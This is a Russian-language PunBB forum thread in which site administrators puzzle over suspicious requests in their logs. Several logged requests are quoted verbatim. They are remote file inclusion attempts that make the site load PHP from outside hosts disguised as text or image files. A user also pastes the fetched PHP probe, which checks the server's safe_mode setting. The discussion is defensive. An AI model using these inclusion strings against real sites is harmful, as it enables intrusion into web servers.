|
Фонд моральной поддержки |
|
Вы не вошли. Пожалуйста, войдите или зарегистрируйтесь.
PunBB по-русски → Безопасность → Странный запрос
Страницы 1
Чтобы отправить ответ, вы должны войти или зарегистрироваться
Сегодня ночью очень странный запрос был на форуме:
/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://channels.dal.net/irwan/test.txt?с адреса 85.17.200.74
Зашел по урлу который в запросе прописан, а там какой-то php скрипт прописан 
Кто с этим сталкивался?
Дырки ищут? И я так понимаю через настройки сервера.
Или я не прав?
Дырки, но не в настройках сервера, а в движке магазина ZenCart : www.xakep.ru/post/33407/default.asp
Вот еще странный запрос
/index.php?title=http://angel.yum.pl/joomla/images/borda10.jpg?Ага была подобная фигня, раза 3.
/viewtopic.php=http://мутный_хостинг.*.jpgТоже насторожило. Явно попытка выполнить код.
А вот и содержание якобы gif файла.
<?php
$SafeMode = @ini_get('safe_mode');
if ($SafeMode == '') { $SafeMode = "Modo_Seguro_off"; }
else { $SafeMode = "Modo_Seguro_on"; }
echo $SafeMode;
?>Чет им интересно стало включен ли сейфмод или нет. Ip дает *****.veloxzone.com.br скрипт был залит на какой-то словацкий инет-магазин.
Озадачилсо...
Страницы 1
Чтобы отправить ответ, вы должны войти или зарегистрироваться
PunBB по-русски → Безопасность → Странный запрос
Сгенерировано за 0.064 секунды (81% PHP — 19% БД) 11 запросов к базе данных
Технологии с открытым исходным кодом, несомненно, обладают серьезным преимуществом над аналогичными продуктами, распространяемыми по ограниченным лицензиям. И совершенно неважно, что это. Возможно это:
Впрочем, неважно. Что бы это ни было, важно всячески поощрять и поддерживать Open Source в любом виде. Тем более, что вы знаете, PunBB распространяется по лицензии GPL/GNU. И спасибо за внимание.